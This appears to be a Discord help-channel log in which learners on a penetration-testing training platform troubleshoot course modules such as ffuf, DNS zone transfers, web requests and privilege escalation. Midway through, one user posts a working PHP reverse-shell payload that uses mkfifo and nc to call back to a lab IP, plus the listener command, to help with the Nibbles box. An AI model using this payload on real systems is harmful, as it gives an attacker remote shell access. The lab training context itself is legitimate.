#

@cobalt rose What kind of trouble are you having?

cobalt rose
#

i was just going through a course. and i had to take the interface down and i did that, i thought trying to confirm if thats really happend. and i opened up the browser and then i get the erro having trouble finding that site.

west canopy
#

Are you using a VM? I take it you've tried commands to stop and restart the interface.

cobalt rose
#

yes sir i am using VM.

west canopy
#

Personally I've had issues with my Kali VM. I used to keep it on Bridged Adapter then one day the network interface just died and I couldn't pull an IP address. So i just ended up rolling it back to an old snapshot and setting it as NAT.

#

I'm sure you've already tried this, but I would probably just google and try any command possible that might restart the interface. If that doesn't work then I would just restore it back to an older snapshot. Wish I had a better answer for you dawg 😦

cobalt rose
#

yes sir i have tried changing it from bridged netw to nat and vice versa. yes sir thanks a lot for the help. i will try to restart the interface and other things.

woven juniper
#

Is there any one available to help with a module?

west canopy
#

Possibly, which module?

woven juniper
#

Network enumeration with nmap, nmap scripting engine

west canopy
#

DM me 🙂

rustic sage
#

yo can anyone help with the Ffuf module?

west canopy
#

@rustic sage I got you bruh!

rustic sage
#

wordcan i dm you?\

west canopy
#

of course

raven cairn
#

I'm doing the Fundmentals of Active Directory and I have no Idea what is going on

#

I am passing the questions but all this stuff is going over my head 😭

#

How do I learn more about AD???

#

Any good advice?

shadow verge
#

I'm doing information gathering module section active subdomain enumeration, I'm really not sure how to find more zones, I have found 22 unique subdomains on the first zone, but I'm stuck, any help?

acoustic owl
#

Look at the hint.
"There are several zones

shadow verge
#

Yes but how can I find them?

#

I only know how to query the inlanefreight.htb

dense fulcrum
shadow verge
#

ok thanks

rustic sage
shadow verge
#

@rustic sage yes ^^

plush minnow
modest moth
plush minnow
gritty karma
#

Hello all, I have a noob question about using cURL to search for flag through JSON POST request to search.php. I just started with HTB and it seems as if I just got lucky to locate flag on previous modules. Any help will be appreciated.

modest moth
gritty karma
#

by the way, it is the Web Request module

molten epoch
#

hey so i started the beginner module for https and i cant even answer the first question "+ 1 To get the flag, use cURL to download the file returned by '/download.php' in the above server." i used up all 120 min and had no idea what do do i kind of just clicked things and stared at the background any help what to do or just give me the answer and i will work backwards

molten epoch
#

http fundamentals the very first one

feral gyro
#

just use curl

molten epoch
#

but i dont understand what the question is even asking of me

#

like what doest it want

feral gyro
#

use curl to get the flag

molten epoch
#

arnt flags given

#

arent they like -0 -o -s

feral gyro
#

no flags needed

molten epoch
#

ok i will try whenever i get another free instance

molten epoch
#

im still really confused because the question says to get the flag

molten epoch
#

so where do i type curl http....

feral gyro
feral gyro
molten epoch
#

and i get there how?

#

to the terminal

feral gyro
#

open the linux terminal and then run the curl command

molten epoch
#

yea when i started the instance i just got a blue background with some files

#

but where do i click to see the terminal

molten epoch
#

ahhh ty so much i will try tomrrow or something

livid pier
#

Random resource - Online textbook

patent blaze
#

Sup folks ! Could anybody help me on Skills Assessment from Using Web Proxies ? I'm on the third task. I've in many different ways to save the question, trying with burp and zap.

rustic sage
dense fulcrum
rustic sage
#

Who can help with Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer. in the Information Gathering module???

lethal atlas
rustic sage
west canopy
#

The way it was explained to me is that the presence of "A" record(s) is one zone, "NS" servers makes it two, and if there was "MX" then that would make it three.

lethal atlas
#

Thanks Jared!! I thought maybe it had to do with the number of NS servers or something. lol

west canopy
#

Yea I'm still not entirely confident about that one. It's still very possible I am incorrect haha

lethal atlas
#

Your explanation makes much more sense.

#

I am so mad!!! Somehow all my notes on the command Injection module did not save. :(((((

#

Now I have to go back and redo everything so I can note it all. AGAIN!!

west canopy
#

RIP 😦

#

No google drive?

lethal atlas
lethal atlas
rustic sage
#

question. i just set up my personal Parrot vm and now im trying to figure out how to use it for academy modules. i can seem to find the vpn option in the ffuf module. is this normal? or am i looking in the wrong place. usually i see it around the cheat sheet at the bottom of the page.

west canopy
#

@rustic sage hmmm.... I'm actually not sure.

#

It looks like it's missing in the FFuF module. But i just checked Windows Fundamentals and the VPN key is located here:

rustic sage
#

yea thats what i saw. i looked on reddit and ppl are syaing to just connect without the vpn. seems kinda suss

west canopy
#

I've seen on some modules I was able to interact with the target while I was not connected to the VPN. Specifically when it looked like a docker instance of some sort.

#

Like if the target was 10.129.108.223:30508

rustic sage
#

ahh ok. ill give it a try.

#

i need some help

#

i am on module WEB REQUESTS
on section HTTP HEADERS

#

this is the question

#

can anyone help, i found this :

#

there is no flag

#

can anyone help?

dapper flare
#

Module: Getting Started
i'm having a hard time getting a reverse shell on Nibbles, i uploaded the php line using the My Image plugin but for some reason when i try going to (ip)/nibbleblog/content/private/plugins/my_image/image.php it won't load, i tried both on my linux machine and the pwnbox, but i'm getting the same exact result

rustic sage
#

can you send screen?

dapper flare
rustic sage
#

can you show me
1: your php file
2: that you have uploaded successfully
3: show me the link

west canopy
#

@rustic sage Check here

rustic sage
#

@west canopy i dont have this

west canopy
#

Looks like they updated the module, this section wasn't here when I first completed it.

rustic sage
dapper flare
west canopy
#

@rustic sage Maybe try refreshing the page?

rustic sage
#

yes let me do it again but wait let me try help this guy

#

can you show me your ifconfig tun0?

rustic sage
#

ok

#

so the command is going to be:

#

<?php system('id'); ?>
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.169 9443 >/tmp/f"); ?>

#

upload the file again

#

then on your bash do ** sudo nc -lvnp 9443**

#

that should work

#

ping me if you need help

dapper flare
#

@rustic sage curl gives no output

rustic sage
#

what do you mean?

#

can you send me a screen

dapper flare
#

wait imma try something i'll hit u up later if it works

rustic sage
#

ok

dapper flare
rustic sage
#

nice

lethal atlas
#

anyone done Command Injections?

west canopy
#

@lethal atlas sure have! What's up?

lethal atlas
#

Hint to everyone. Read carefully. Lol

patent blaze
#

@lethal atlas hey bud, can I DM you ?

rustic sage
#

Yes

#

Use bloodhound 4.0.3

#

I posted the information on some prolabs channel only

unreal hull
#

Someone can help me with this? I've tried a different forms using "grep" command but I don't know exactly which pattern I must filter.

unreal hull
#

Linux Fundamentals

lethal atlas
#

section?

unreal hull
#

Filter Contents

#

It's the last questions

#

question

lethal atlas
#

ah yes. this question requires the use of several things. Curl, tr, cut, grep, sort, wc. all in one nice command

west canopy
#

@unreal hull Feel free to DM me. That question is extremely difficult given that it's a "Tier 0" fundamental module.

raven cairn
#

I think they should fix that question

#

Too difficult

#

For a beginner at least

molten epoch
#

module web request section http request and response how do i send a get request

molten epoch
#

http request and responce

feral gyro
#

just go to that spawned ip

#

that's it

#

and on firefox u need to inspect the element

#

to find HTTP Headers

molten epoch
#

Got it ty

#

module web request

#

module web request section http headers my target machine doesn't seem to work

west canopy
#

@molten epoch Sorry if this is a silly question, but have you tried respawning the target to see if the error persists?

molten epoch
#

its not silly and yes i tried 4 differnet machines

west canopy
#

Ah. Maybe another dumb question, but you're navigating to http and not https right?

molten epoch
#

idk i just copy and past the ip into firfox

west canopy
#

I'm gonna try it on my end. One sec.

molten epoch
#

it loaded finally but i dont see a file named flag

west canopy
#

One of my buddies ran into the same issue. The hint says to try refreshing the page if it doesn't show up... When I did this section earlier today on my VM, the "flag" request loaded automatically

#

Just loaded right away for me

molten epoch
#

ok i will keep reolading until i see it

#

ive reloaded like 7 times and it always the same things

#

are you using the provided os or are u on you using openvpn

#

this is all i get reloaded 16 times and counting

feral gyro
west canopy
#

I was using the pwnbox just now.

molten epoch
#

i dont know how to do it on my own machine

#

really well i will try tomorrow ran out of time for the machine

feral gyro
summer pecan
#

Hello all I'm working on Skills Assessment Login Brute Force, the Service Login SSH section. I'm wondering if I'm on the right track, I'm assuming it's referring to wither bill or harry?

#

or am I completely missing something

#

I created a custom username and password list, but hydra is saying it's going to take 2:52 in order to finish

west canopy
#

@summer pecan DM me 🙂

livid pier
sinful gorge
lethal atlas
lethal atlas
#

quiet night in here?

rustic sage
#

hello

#

i am on module Attacking Web Applications with Ffuf

#

on section filtering results

#

this is the question

#

and when i try ffuf

#

there is huge output

#

what do i have to do

#

its 300+ results

#

@rustic sage You need to filter the results.

#

yes but how?

#

there are many options when i try ffuf -h

#

@rustic sage Find what most results have in common, and filter them out.

#

wipe them out?

#

Ehhh, yes.

#

size 986

#

🧹

#

ffuf -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://139.59.175.51:30727/ -H 'Host: FUZZ.academy.htb' -fs 986

#

is this?

#

So, add a filter to your ffuf, that should "wipe out" any result with file size 986

#

No spoilers here, please

#

yes but which one is the correct filter?

#

Where did you get this command from, then?

#

htb academy ?

#

Right, so run a ffuf scan w/o a filter and pay attention what most results have in common, and filter them out

#

yes, how can i filter them out, i cant find the command

#

Did you try what you typed above?

rustic sage
#

Yes.

#

still going

#

we will see

#

Have you updated your /etc/hosts file, btw?

#

oh

#

no let me do it now

#

so i do:
<target_ip> academy.htb

#

?

#

@rustic sage

#

@rustic sage Yes.

dull bear
#

Hi guys I need some pointers on the ldapadmin password step

#

On Windows priv escalation assessment

#

Anyone that I can DM?

cedar harbor
#

anyone have solution for RouterSpace machine?

rustic sage
#

@rustic sage look bro

#

this is on nano /etc/hosts

rustic sage
rustic sage
#

ok on section filtering results?

#

Yes @rustic sage

#

<ip> that_link

#

In that window that shows you how to run a ffuf scan

#

i cant find it

#

i have to take a break

#

cyaa later

cedar harbor
#

anyone have solution for RouterSpace machine? please

cedar harbor
#

Thanks

summer pecan
#

@west canopy thank you for the help, I wasn't filtering my password list for the ssh challenge, worked in about 10 min once I did

#

stinking sed commands....

livid pier
#

I think you will need to register to see it

slow ruin
#

Stuck on Windows Privilege Escalation - Kernel Exploits. I received confirmation that one of the three exploits is broken which is the CVE-2020-0668. Was wondering what exploit was used to get the answer. Currently trying CVE-2021-1675.ps1 but I am unable to use the Invoke-Nightmare command

rustic sage
#

having issues with subdomain fuzzing. can some one give me a push in the correct direction?

#

disregard.

west canopy
#

@slow ruin So my notes on that section aren't super detailed, but it looks like I had to copy the flag to my machine from SMB

slow ruin
livid pier
eternal turret
#

cant someone help here completely lost.. or a hint

#

never mind found out how... :p

fathom bay
#

can anyone help me understand the "Active Subdomain Enumeration" of the "Information Gathering - Web Edition"? i honestly am so confused by everything and ive reread this section like 5 times and read some articles about zones but it doesnt make any sense to me, why are there only x zones, how to get the zones that have disabled file transfer for the other 2 FQDN questions, i get no TXT results.
I checked this thread to see if someone was asking this question and there was a guy who ran the same command as me, but i didnt get any TXT when i used dig but he did

#

If anyone has any notes or articles please send them my way, i will take a look in the morning. Ive been tunneling on this for the past 2 hours at this point

#

this is my axfr output

rustic sage
rich mulch
#

Hi guys, I am stucking this question (Module: Hacking Wordpress)
Any hints?

rustic sage
#

Module: Command Injections
All three characters return "Invalid Input" - unless I do not URL encode & - but does not get accepted as the right answer.

acoustic owl
tall saffron
#

some questions are weirdly ask like in some exams xD

hazy grotto
#

Im working on footprinting, FTP.... i am trying to connect to the FTP with anon login but i only get root

#

if i try to LS i get pw request

hazy grotto
#

nvm zorro showed me how stupid i actually am

#

its good to be shown our limits. really humbles you

#

have you ever edited the samba client?

livid pier
feral gyro
livid pier
rich mulch
#

Hello guys, can someone explain me why I cannot use Hydra to bruteforce login-page of Wordpress?
The password of erika is 010203

rustic sage
#

yoo

#

am new to hacking codes

feral gyro
#

👋

livid pier
#

Welcome

fathom bay
fathom bay
#

i tagged it so i dont copypaste it

livid pier
#

Oh I cant help with theoretical questions like that, sorry

fathom bay
#

haha fair enough. can you tell me if im using the right command for dig, what am i missing. i searched this server and a guy was using the same command and was getting txt records as well

#

do i need to add the server etc/hosts or etc/resolv.conf

livid pier
#

K let me take a look 1 sec

fathom bay
#

sure, thanks

livid pier
# fathom bay sure, thanks

Alright my bad, I was looking for the dms i had, the last time I helped someone with this question, I couldnt find them tho, What question are you stuck on?

fathom bay
#

all of them after the first one. i got the second one right but it was a lucky conincidence

livid pier
#

try transferring the zone... and nsztm1 with what you are curious about

#

that should give you more domain names

fathom bay
#

thing is i dont understand exactly what the zones are. i know how many are

#

is one of them the namepsace?

livid pier
#

the first one is what you were originally given the in the first question, second one is the answer from the first question

fathom bay
#

right?

livid pier
#

yes

#

/etc/hosts

sly grotto
#

hey guys. I got stuck in sqlmap essential in htb academy.i cant find flag for case 6 and 7.does anyone solve them?

fathom bay
# livid pier /etc/hosts

but what do i add there? if i add the ip from the box and the inlanefreight.htb nothing happens

livid pier
#

Really>

#

hmm

fathom bay
livid pier
#

did you add the ns?

#

put both in there

fathom bay
#

nop, changes nothing

#

if i add the ns there then it is like i do the nslookup with the ip

livid pier
#

let me see the /etc/hosts

fathom bay
livid pier
#

well ill be

#

@feral gyro are you around? have you done info gathering web edition?

#

Alright I will try, i was doing a box so i was putting this off

#

@fathom bay bro it works

#

Are you connected to the vpn?

feral gyro
livid pier
feral gyro
#

like github subdomains

livid pier
#

@cedar meteor ❤️ dont worry life will get better

#

but until then @languid dawn or @novel matrix can we ban this guy?

languid dawn
#

Hmm I missed it

#

👀

acoustic owl
feral gyro
rich mulch
acoustic owl
rustic sage
#

how do I connect via ssh

rough pelican
#

ssh user@ip
you can add -i if you have a key

rustic sage
#

how

feral gyro
rustic sage
#

LINUX FUNDAMENTALS System Information

feral gyro
#

then enter the password

rustic sage
#

thanks

rustic sage
#

Who did skill assessment in Command Injection?

haughty kiln
#

Can somebody give me a hint in "SQL Injection - Union Injection"? I can't figure out what they mean by "user()" :/
Question: "Use a Union injection to get the result of 'user()' "

lethal atlas
rustic sage
lethal atlas
#

@haughty kiln just like he said, look at the example just above the question and change it

haughty kiln
#

That was the first thing I did, but I only get an empty output xD

#

Or i get an error "unknown system variable"

rustic sage
#

Answered you @haughty kiln

lethal atlas
feral gyro
#

yes brother

rustic sage
livid pier
leaden venture
#

Has anyone done the web requests module

lethal atlas
leaden venture
#

I am struggling with one of the boxes in that module - HTTP Headers and I have been reading and rereading and I am not sure what I am missing

lethal atlas
slow venture
#

Hey there, can anyone give me a nudge on the Linux Priv Esc - Miscellaneous Techniques module? I'm generally confused on how to start. they just give an ip address... nothing to ssh to so am I supposed to hunt for creds?

rustic sage
#

WTF is this

#

here is the full code:
Rabos@htb[/htb]$ curl -X DELETE http://Rabos@htb[/htb]$ curl -s http://<SERVER_IP>:<PORT>/api.php/city/New_HTB_City | jq

#

what do i have to do?

#

the code is broken

mossy solstice
#

module ?

rustic sage
rustic sage
hazy grotto
#

Im trying to grab a smbclient banner in the footprinting module

#

I seem to be using the wrong commands

molten epoch
#

Module

#

Module web request section GET i dont understan what im supossed to do to answer the question at the end\

acoustic owl
hazy grotto
scarlet finch
#

do some effort

rancid sinew
#

i'm looking at a pcap. should I be able to access the url that's in the pcaps?

rustic sage
#

question about the "web applications" module, in the following scheme, they say each server runs a "component", what exactly would a component be ?

tulip jetty
#

hey guys... anyone can help me in a problem that i have with the IP htb module give me.... the IP didnt work..

#

i put the IP address but it didnt charge the web

#

:p

acoustic owl
tulip jetty
#

the pwn box

#

lol

#

xd